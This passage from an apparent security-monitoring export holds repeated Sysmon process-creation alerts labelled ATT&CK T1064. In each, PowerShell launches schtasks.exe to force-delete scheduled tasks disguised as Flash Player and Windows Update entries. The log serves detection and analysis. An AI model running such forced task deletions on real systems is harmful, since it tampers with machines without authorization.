{df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.082"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-001009fa2600}"",""processId"":""2128"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.322",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.956 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001035f82600} +ProcessId: 7648 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.964486400Z"",""eventRecordID"":""3053"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.956\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001035f82600}\r\nProcessId: 7648\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.956"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-001035f82600}"",""processId"":""7648"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.684",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.862 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-0010eff22600} +ProcessId: 1552 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN AdobeFlashPlayer /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN AdobeFlashPlayer /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.875132100Z"",""eventRecordID"":""3052"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.862\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-0010eff22600}\r\nProcessId: 1552\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN AdobeFlashPlayer /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.862"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-0010eff22600}"",""processId"":""1552"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN AdobeFlashPlayer /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.667",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.805 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-00106aef2600} +ProcessId: 7692 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.821239000Z"",""eventRecordID"":""3051"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.805\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-00106aef2600}\r\nProcessId: 7692\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.805"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-00106aef2600}"",""processId"":""7692"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.654",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.758 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001031eb2600} +ProcessId: 5556 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.795583200Z"",""eventRecordID"":""3050"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.758\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001031eb2600}\r\nProcessId: 5556\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.758"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-001031eb2600}"",""processId"":""5556"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.637",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.717 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001086e72600} +ProcessId: 7420 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.747247900Z"",""eventRecordID"":""3049"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.717\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001086e72600}\r\nProcessId: 7420\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.717"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-001086e72600}"",""processId"":""7420"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.622",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.658 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001094e42600} +ProcessId: 4908 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update_windows /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update_windows /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.668462200Z"",""eventRecordID"":""3048"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.658\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001094e42600}\r\nProcessId: 4908\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update_windows /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 